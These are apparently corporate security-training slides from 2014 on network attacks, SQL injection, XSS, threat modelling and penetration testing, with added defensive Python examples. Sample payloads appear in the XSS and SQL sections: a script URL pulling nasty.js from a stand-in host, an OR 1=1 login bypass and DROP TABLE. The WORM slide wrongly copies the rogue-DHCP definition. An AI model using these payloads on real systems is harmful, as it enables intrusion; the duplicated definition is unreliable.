SECURITY CONCEPTS Dec 2014


• According to the Internet Storm Center (http://isc.sans.org), a computer connected to the Internet has an average of 5 minutes before it falls under some form of attack.

CURRENT STATISTICS

• http://securelist.com/statistics/

AGENDA:

1. Network Security

2. Threats and Vulnerability

3. Application, Data and Host Security

4. Security Threat Modelling

5. Penetration Testing

1. NETWORK SECURITY

NETWORK SECURITY PRINCIPLE

• Confidentiality: only sender, intended receiver should “understand” message contents

o sender encrypts message

o receiver decrypts message

• Authentication: sender, receiver want to confirm identity of each other

• Message Integrity: sender, receiver want to ensure message not altered (in transit, or afterwards) without detection

• Access and Availability: services must be accessible and available to users

NETWORK SECURITY THREATS

FRIENDS AND ENEMIES: ALICE, BOB, TRUDY

• well-known in network security world

• Bob, Alice (lovers!) want to communicate “securely”

• Trudy (intruder) may intercept, delete, add messages

[Figure: secure sender Alice and secure receiver Bob exchange data and control messages over a channel; Trudy sits on the channel with access to the data.]

Who might Bob, Alice be?

• … well, real-life Bobs and Alices!

• Web browser/server for electronic transactions (e.g., on-line purchases)

• on-line banking client/server

• DNS servers

• routers exchanging routing table updates

• other examples?


PRIVILEGE ESCALATION

APPLICATION LAYER ATTACK – LAYER 7

• HTTP: Virus, Worms, SQL Injection, XSS

• Malware: Trojans, Backdoors

SNIFFER ATTACK

• Wireshark

• CAIN and Abel

• TCPdump

• Kismet

• Dsniff

• ettercap

• Paros Proxy, Burp proxy

MAN IN THE MIDDLE ATTACK

DOS ATTACK

DOS ATTACK TOOLS

• Jolt2

• Bubonic.c

• Land and LaTierra

• Targa

• Blast20

• Nemesy

• Panther2

• Crazy Pinger

• Some Trouble

• UDP Flood

• FSM

• FSMax

REFLECTION DOS

The attacking machines send out huge volumes of SYN packets, but with the IP source address pointing to the target machine.

SMURF ATTACK

MANGLE – INVALID PACKET ATTACK

Tools to simulate Invalid Packet attack

• Nmap

• Nessus

Tools to handle this

• iptables (Linux)

• Checkpoint

• Netfilter

• Applications also need to handle this

DDOS ATTACK

SYN FLOOD

TCP ATTACK

• Send multiple TCP Reset packets

UDP ATTACK

BOTNET

• Exploit the system and make it a bot client -> make the botnet server aware it has joined the botnet -> install anti-antivirus module -> listen to the botnet server for instructions

BUFFER OVERFLOW

A flaw that occurs when more data is written to a block of memory, or buffer, than the buffer is allocated to hold.

ROGUE DHCP SERVER

• Malicious software in the network

• A type of Man in middle attack

• Installed using rootkit

• Will spoof data, make network slow and create network problems

EAVESDROPPING

• Eavesdropping is secretly listening to the private conversation of others without their consent, as defined by Black's Law Dictionary.

• Unencrypted open wifi network

• Tool: Firesheep

SOCIAL ENGINEERING ATTACK

• Phishing is a technique of fraudulently obtaining private information. Typically, the phisher sends an e-mail that appears to come from a legitimate business—a bank, or credit card company—requesting "verification" of information and warning of some dire consequences if it is not provided.

• Phone phishing uses a rogue IVR system to recreate a legitimate-sounding copy of a bank or other institution's IVR system.

• Baiting is like the real-world Trojan Horse that uses physical media and relies on the curiosity or greed of the victim.

• Shoulder surfing involves observing an employee's private information over their shoulder. This type of attack is common in public places such as airports, airplanes or coffee shops.

WORM

• Malicious software in the network

• A type of Man in middle attack

• Installed using rootkit

• Will spoof data, make network slow and create network problems

ROOTKIT

A rootkit is a stealthy type of software, typically malicious, designed to hide the existence of certain processes or programs from normal methods of detection and enable continued privileged access to a computer.

MAC FLOODING - ARP

In a typical MAC flooding attack, a switch is fed many Ethernet frames, each containing different source MAC addresses, by the attacker. The intention is to consume the limited memory set aside in the switch to store the MAC address table.

Tool: dsniff
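As an added example (not from the slides), the following Python detection logic shows how a defender can spot the behaviour described above from per-frame records: it counts the distinct source MAC addresses seen on each switch port inside a sliding time window and flags ports that exceed a threshold. The record format, the port numbers, the MAC addresses and the threshold are all constructed for the example.

```python
import re
from collections import defaultdict

# Constructed record format, as a monitoring tap or flow collector might export it:
#   "<epoch seconds> port=<switch port> src=<source MAC>"
LINE = re.compile(
    r"^(?P<ts>\d+(?:\.\d+)?) port=(?P<port>\d+) "
    r"src=(?P<mac>(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2})$"
)

# Constructed sample: port 1 carries ordinary traffic from five hosts; port 3 sees
# 150 frames with 150 different source MACs within 1.5 seconds (the flooding pattern).
NORMAL = [f"{100 + i}.00 port=1 src=00:11:22:33:44:{i % 5:02x}" for i in range(20)]
FLOOD = [f"{100 + i * 0.01:.2f} port=3 src=02:00:00:00:{i // 256:02x}:{i % 256:02x}"
         for i in range(150)]
SAMPLE_LOG = NORMAL + FLOOD + ["garbage line that should be ignored"]


def parse(line):
    """Return (timestamp, port, mac) for a well-formed record, or None otherwise."""
    m = LINE.match(line.strip())
    if not m:
        return None
    return float(m["ts"]), int(m["port"]), m["mac"].lower()


def flood_alerts(lines, window=10.0, threshold=100):
    """Map each port whose distinct-source-MAC count within any `window` seconds
    exceeds `threshold` to the highest such count observed on it."""
    by_port = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec:
            ts, port, mac = rec
            by_port[port].append((ts, mac))

    alerts = {}
    for port, recs in by_port.items():
        recs.sort()
        in_window = defaultdict(int)   # mac -> number of frames inside the window
        start = 0
        for ts, mac in recs:
            in_window[mac] += 1
            # slide the window forward: drop frames older than `window` seconds
            while recs[start][0] < ts - window:
                old_mac = recs[start][1]
                in_window[old_mac] -= 1
                if in_window[old_mac] == 0:
                    del in_window[old_mac]
                start += 1
            if len(in_window) > threshold:
                alerts[port] = max(alerts.get(port, 0), len(in_window))
    return alerts


if __name__ == "__main__":
    print(flood_alerts(SAMPLE_LOG))   # {3: 150}
```

A real switch's CAM table holds thousands of entries, so the threshold should be set from the port's normal distinct-MAC count rather than from the table size; port security limits on the switch remain the primary control, and this logic is the detection layer behind them.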

DNS CACHE POISONING

DNS spoofing (or DNS cache poisoning) is a computer hacking attack whereby data is introduced into a Domain Name System (DNS) resolver's cache, causing the name server to return an incorrect IP address, diverting traffic to the attacker's computer (or any other computer).

URL ENCODING OR CANONICALIZATION

Canonicalization is when a resource can be represented in more than one manner.

Canonicalization of URLs occurs in a similar manner, where http://domain.tld/user/foo.gif and http://domain.tld/user/bar/../foo.gif would represent the same image file.

Inconsistent canonicalization results in XSS and SQL injection attacks.

Cross-Site Scripting

Excerpt from an arbitrary web page, "getdata.php": echo $HTTP_GET_VARS["data"];

URL-encoded attack: http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2fwww.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e

HTML execution: <script src="http://www.badplace.com/nasty.js"></script>

(URL-encoding cheat sheet: see the BACKUP table at the end.)
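The following Python example, added here and not part of the slides, carries the canonicalization and XSS passages above through in code: it percent-decodes the attack URL to show what getdata.php actually receives, shows that a filter applied to the raw (still-encoded) URL misses the script tag while the same filter applied after decoding catches it, normalizes the two equivalent domain.tld URLs to one canonical path, HTML-escapes the parameter before echoing it (the fix for the echoed-input XSS), and reproduces entries of the percent-encoding table from the BACKUP slide. The hostnames are the slides' own placeholders.

```python
import html
import posixpath
from urllib.parse import unquote, urlsplit

# Inputs taken from the slide text (the hostnames are the slides' placeholders, not real hosts).
ENCODED_XSS = ("http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2f"
               "www.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e")
CANON_A = "http://domain.tld/user/foo.gif"
CANON_B = "http://domain.tld/user/bar/../foo.gif"


def canonical_path(url):
    """Percent-decode the path and collapse '.' and '..' so equivalent URLs compare equal."""
    return posixpath.normpath(unquote(urlsplit(url).path))


def same_resource(url_a, url_b):
    """True when two URLs name the same host and the same canonical path."""
    a, b = urlsplit(url_a), urlsplit(url_b)
    return a.netloc.lower() == b.netloc.lower() and canonical_path(url_a) == canonical_path(url_b)


def decoded_data_param(url):
    """What getdata.php sees in its 'data' parameter after the web server percent-decodes it."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if unquote(key) == "data":
            return unquote(value)
    return ""


def looks_like_script(text):
    """Naive content filter; only meaningful when applied to the decoded value."""
    return "<script" in text.lower()


def render_safely(value):
    """Hardened replacement for echo $HTTP_GET_VARS["data"]: HTML-escape before output."""
    return html.escape(value, quote=True)


def percent_encode_all(text):
    """Encode every character as %XX, the way the BACKUP table lists them."""
    return "".join(f"%{ord(c):02X}" for c in text)


if __name__ == "__main__":
    payload = decoded_data_param(ENCODED_XSS)
    print(payload)                              # <script src="http://www.badplace.com/nasty.js"></script>
    print(looks_like_script(ENCODED_XSS))       # False: the filter ran before decoding
    print(looks_like_script(payload))           # True: the same filter after decoding
    print(same_resource(CANON_A, CANON_B))      # True
    print(render_safely(payload))               # &lt;script src=&quot;...&quot;&gt;&lt;/script&gt;
    print(percent_encode_all("a:"))             # %61%3A
```

The point the slides make about canonicalization shows up in the two `looks_like_script` calls: any validation that runs before the input is decoded and normalized checks a different string from the one the application will actually use.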

PACKET TAPPING• Hardware to monitor packet

• vssmonitoring.com

MIME HEADER PARSING

• Several Win32 mass mailers send themselves via an email with a MIME-encoded malicious executable with a malformed header, and the executable will silently execute unbeknownst to the user.

• This occurs whenever Internet Explorer parses the mail and thus can happen when simply reading or previewing email. Thus, email worms can spread themselves without any user actually executing or detaching a file.

http://www.kb.cert.org/vuls/id/980499


REPLAY ATTACK

• A replay attack (also known as a playback attack) is a form of network attack in which a valid data transmission is maliciously or fraudulently repeated or delayed.
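As an added illustration (constructed for this page, not from the slides), the following Python code shows the standard defence against the attack just defined: the sender attaches a timestamp and a fresh nonce to every message and authenticates them with an HMAC, and the receiver rejects any message whose tag fails, whose timestamp falls outside a freshness window (a delayed message), or whose nonce it has already seen (a repeated message). The shared key, the message fields and the 30-second window are assumptions of the example.

```python
import hashlib
import hmac
import json
import secrets

# Constructed shared secret; a real system would establish it with a key exchange.
SHARED_KEY = b"constructed-shared-secret-for-the-example"
FIELDS = ("payload", "ts", "nonce")


def _canonical(msg):
    """Deterministic byte encoding of the authenticated fields."""
    return json.dumps({k: msg[k] for k in FIELDS}, sort_keys=True).encode()


def make_message(payload, now, key=SHARED_KEY):
    """Sender side: attach timestamp and fresh nonce, then tag them with HMAC-SHA256."""
    msg = {"payload": payload, "ts": int(now), "nonce": secrets.token_hex(8)}
    msg["tag"] = hmac.new(key, _canonical(msg), hashlib.sha256).hexdigest()
    return msg


class Receiver:
    """Receiver side: verifies tag, freshness and nonce uniqueness."""

    def __init__(self, key=SHARED_KEY, window=30):
        self.key = key
        self.window = window   # seconds a message may legitimately be in flight
        self.seen = {}         # nonce -> timestamp, for replay detection

    def accept(self, msg, now):
        if not all(k in msg for k in FIELDS + ("tag",)):
            return "reject: malformed"
        expected = hmac.new(self.key, _canonical(msg), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, str(msg["tag"])):
            return "reject: bad tag"    # modified or forged message
        if abs(now - msg["ts"]) > self.window:
            return "reject: stale"      # delayed beyond the freshness window
        # Forget nonces older than the window so the cache stays bounded; a replay
        # of such an old message is already rejected by the stale check above.
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.window}
        if msg["nonce"] in self.seen:
            return "reject: replay"     # identical message seen before
        self.seen[msg["nonce"]] = msg["ts"]
        return "accept"


if __name__ == "__main__":
    receiver = Receiver()
    original = make_message("transfer 100", 1000.0)
    print(receiver.accept(original, 1001.0))   # accept
    print(receiver.accept(original, 1002.0))   # reject: replay
    print(receiver.accept(original, 1100.0))   # reject: stale
```

The order of the checks matters: the tag is verified first so that an attacker cannot probe the nonce cache or the clock window with unauthenticated messages, and the window keeps the cache of seen nonces from growing without bound.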

KEYLOGGER

• Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording (or logging) the keys struck on a keyboard.

• There are numerous keylogging methods, ranging from hardware-based to software-based.

2. THREATS AND VULNERABILITIES

TOP 10 VULNERABILITY SCANNER TOOLS

1. Nessus

2. OpenVAS

3. Core Impact

4. Nexpose

5. GFI LanGuard

6. QualysGuard

7. MBSA

8. Retina

9. Secunia

10. SAINT

VULNERABILITY RESEARCH WEBSITES

• http://www.kb.cert.org/vuls

• www.securitytracker.com

• www.microsoft.com/security

• www.securiteam.com

• www.packetstormsecurity.com

• www.hackerstorm.com

• www.hackerwatch.org

• www.securityfocus.com

• www.securitymagazine.com

VULNERABILITY SEARCH

• https://web.nvd.nist.gov/view/vuln/search

SOFTWARE EXPLOITATION

• Database

• Email

• Spyware – Join MS SpyNet using Windows Defender

• Rootkits - http://www.liutilities.com/products/wintaskspro/processlibrary.

SURVIVING MALICIOUS CODE

• Viruses

• Trojan Horses

• Logic Bombs

• Worms

• Antivirus Software

ATTACK

• Access attack – Dumpster diving, Eavesdropping, Snooping, Interception

• Modification and Repudiation attack

• DOS attack – ping of death, buffer overflow

• Botnets - http://www.microsoft.com/security/sir

COMMON ATTACKS

• Backdoor

• Spoofing

• Phishing

• Man-In-Middle attack

• Replay attack

• Password guessing

• Privilege escalation

3. APPLICATION, DATA AND HOST SECURITY

APPLICATION AND DATA SECURITY

• Web Application

• OWASP Top 10 - https://www.owasp.org/index.php/OWASP_Top_Ten_Cheat_Sheet

• Hacking Tools: Instant Source, Wget, WebSleuth, BlackWidow, WindowBomb, Burp, cURL

SQL – TABLE NAME: USERS

Name     Age  Email              Password  City
Ram      35   [email protected]    ram@123   Bangalore
Krishna  24   Krishna@nec.com    098kkk    Mysore
Parul    20   parul@gmail.com    Pp234     chennai

SELECT age FROM users WHERE name='Parul';

UPDATE users SET email='[email protected]' WHERE name='Ram'; -- This is a comment

INSERT INTO users VALUES ('Puja', 30, '[email protected]', 'ppp123', 'Ooty');

DROP TABLE users;

e.g. PHP code (vulnerable: user input is pasted straight into the query text):

$result = mysql_query("select * from users where(name='$user' and password='$pass');");

Add username as: Bina' OR 1=1);--

The query that actually runs (everything after -- is a comment, so the password check disappears):

$result = mysql_query("select * from users where(name='Bina' OR 1=1);-- and password='junkvalue');");

SQL INJECTION STATISTICS

http://web.nvd.nist.gov/view/vuln/statistics

SQL INJECTION COUNTERMEASURES

• Input validation

– Check it is in a valid format (whitelisting)

– Input sanitization

  Blacklisting: reject ' ; --

  Escaping problematic characters

• Use prepared statements (PHP mysqli; the original slide wrote "new mysql", which is not a PHP class)

$db = new mysqli("localhost", "Sita", "ssttpass", "DB");

$statement = $db->prepare("select * from users where(name=? AND password=?)");

$statement->bind_param("ss", $user, $pass);

$statement->execute();
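To make the slides' PHP example and its prepared-statement fix concrete, here is an added Python/SQLite version (not the slides' code) that builds the USERS table from the slides, runs the login query both by string interpolation, which the Bina' OR 1=1);-- username subverts, and as a parameterised query, which treats the same input as a literal name, and adds the whitelisting check from the countermeasures list. Ram's e-mail address is a constructed placeholder because the slides redact it.

```python
import re
import sqlite3

# Constructed copy of the slides' USERS table (Ram's e-mail is a placeholder).
ROWS = [
    ("Ram", 35, "ram@example.com", "ram@123", "Bangalore"),
    ("Krishna", 24, "Krishna@nec.com", "098kkk", "Mysore"),
    ("Parul", 20, "parul@gmail.com", "Pp234", "chennai"),
]

INJECTED_USER = "Bina' OR 1=1);--"   # the payload from the slides


def make_db():
    """In-memory SQLite database with the slides' table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, age INTEGER, email TEXT, password TEXT, city TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", ROWS)
    return db


def login_vulnerable(db, user, pw):
    """Mirrors the PHP on the slide: untrusted input is pasted into the SQL text,
    so a quote in the username ends the literal and the rest becomes SQL."""
    sql = f"select name from users where(name='{user}' and password='{pw}')"
    return sorted(row[0] for row in db.execute(sql))


def login_prepared(db, user, pw):
    """Prepared statement: the values travel separately from the SQL, so quotes
    and comment markers inside them are plain data."""
    sql = "select name from users where(name=? and password=?)"
    return sorted(row[0] for row in db.execute(sql, (user, pw)))


def valid_username(user):
    """Whitelist check from the countermeasures list: letters, digits and underscore only."""
    return re.fullmatch(r"[A-Za-z0-9_]{1,32}", user) is not None


if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, INJECTED_USER, "junkvalue"))   # ['Krishna', 'Parul', 'Ram']: every user
    print(login_prepared(db, INJECTED_USER, "junkvalue"))     # []
    print(valid_username(INJECTED_USER))                      # False
```

Whitelisting and the prepared statement are complementary: the parameterised query is what stops the injection, and the format check rejects junk early and gives a clean error, but it is not a substitute for parameterisation on fields that legitimately contain quotes.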

CROSS SITE SCRIPTING

XSS

• Stored XSS

– Attacker sends a malicious script to the genuine web server, where it is stored

– Client accesses the genuine web server

– The client's browser runs the malicious script, which sends data to the attacker

• Reflected XSS attack

• Echoed input

• Prevention: Input validation

4. SECURITY THREAT MODELING

IMPORTANT KEYWORDS

• Threat Model

• Asset

• Threat

• Attack

• Attacker

• Impact

• Probability

• Mitigation

• Subject

IMPORTANT KEYWORDS CONTD…

• Object

• Action

• Intended Action

• Unintended Action

• Trust Boundary

• Subject/Object Matrix

• Actor/Action Matrix

• Data Flow Diagram

• Attack Tree

• IT Audit

THREAT MODELING

• Formal method to identify and enumerate risk

• Make informed risk decisions in regards to

– Actions

– Threats

– Mitigation against risk

WHAT CAN BE THREAT MODELED?

• Applications/ Software

• Systems

• Policies and Procedure

• Business Processes

• Anything….

WHEN TO DO THREAT MODELING

• Should be part of SDL

• Should be Iterative Process

• Whenever changes are made

RISK MANAGEMENT

• Risk Identification – incidents, bug reports, testing

• Risk Enumeration & Classification – impact, how and when it can occur, nature of risk

• Mitigation identification – cost benefit analysis

• Mitigation testing – Penetration testing, Third party design review, procedural review and management signoff, Legal review

THREAT MODEL PROCESS OVERVIEW

• Define Use Scenarios

• Define Security Assumptions

• Create/Update data flow diagram

• System Decomposition

• Identify Threats

• Determine Risks

• Plan Mitigations

• Iterate Threat Model

THREAT MODEL PROCESS METHODOLOGIES

• Microsoft STRIDE/DREAD

• NSA’s InfoSec Assessment Methodology

• CERT’s Octave

STRIDE

• Spoofing

• Tampering

• Repudiation

• Information Disclosure

• Denial of Service

• Escalation of Privilege

DREAD

• Damage Potential

• Reproducibility

• Exploitability

• Affected Users

• Discoverability

IAM

• Designed by NSA

• Used by US Federal Government

• Assessment broken into 10 different areas

• Designed to assess the risk of automated information systems that support infrastructure

• Highly detailed and rigid process

http://csrc.nist.gov/publications/PubsSPs.html#800-30

http://csrc.nist.gov/publications/nistpubs/800-115/SP800-115.pdf

OCTAVE

• Originates from Carnegie Mellon University’s Software Engineering Institute in collaboration with CERT

• Focuses on organizational risk, not technical risk

• OCTAVE for large organizations and OCTAVE-S for small organizations.

http://www.cert.org/octave/

MS THREAT MODELING TOOL

• Based on CIA methodology

• Comprehensive attack library

• Contain helpful advanced features

http://www.microsoft.com/en-in/download/confirmation.aspx?id=42518

http://msdn.microsoft.com/en-us/library/ff649779.aspx

5. PENETRATION TESTING

THREE PRE TEST PHASES

• Footprinting:

– Whois (internic.net), SmartWhois, nslookup

– Check company webpage, contact, location, numbers, www.archive.org, whatismyip.com

– Employee blogs, Job boards

• Scanning

– Identifying active systems

– Discover open ports and access points

– Fingerprinting the OS

– Uncovering services on ports

Tools-> nmap, ping, traceroute, netcat

THREE PRE TEST PHASES CONTD….

• Enumerating

– Identify user accounts

– discover NetBIOS name with Nbtscan

– SNMPutil for SNMP

– Windows DNS query

– Establishing Null session

Tools->

Vulnerability Scanner: Retina, SAINT

Password Crackers: Brutus

IMPORTANT URLS

• Privilege Escalation: http://blog.spiderlabs.com/2012/12/my-5-top-ways-to-escalate-privileges.html

• Sniffer Tools : http://sectools.org/tag/sniffers/

DEFENDING REPUTATION ON INTERNET

• http://www.defendmyname.com

• http://www.reputationdefender.com

• http://www.visibletechnologies.com

REFERENCES

• Google

• Old training Materials

• Wikipedia

• Security books

BACKUP

URL-encoding table (character and its %hex code):

Char  Code   Char       Code   Char  Code
a     %61    backspace  %08    :     %3A
b     %62    tab        %09    ;     %3B
c     %63    linefeed   %0A    <     %3C
d     %64    creturn    %0D    =     %3D
e     %65    space      %20    >     %3E
f     %66    !          %21    ?     %3F
g     %67    "          %22    @     %40
h     %68    #          %23    A     %41
i     %69    $          %24    B     %42
j     %6A    %          %25    C     %43
k     %6B    &          %26    D     %44
l     %6C    '          %27    E     %45
m     %6D    (          %28    F     %46
n     %6E    )          %29    G     %47
o     %6F    *          %2A    H     %48
p     %70    +          %2B    I     %49
q     %71    ,          %2C    J     %4A
r     %72    -          %2D    K     %4B
s     %73    .          %2E    L     %4C
t     %74    /          %2F    M     %4D
u     %75    0          %30    N     %4E
v     %76    1          %31    O     %4F
w     %77    2          %32    P     %50
x     %78    3          %33    Q     %51
y     %79    4          %34    R     %52
z     %7A    5          %35    S     %53
{     %7B    6          %36    T     %54
|     %7C    7          %37    U     %55
}     %7D    8          %38    V     %56
~     %7E    9          %39    W     %57
                               X     %58
                               Y     %59
                               Z     %5A
                               [     %5B
                               \     %5C
                               ]     %5D
                               ^     %5E
                               _     %5F
                               `     %60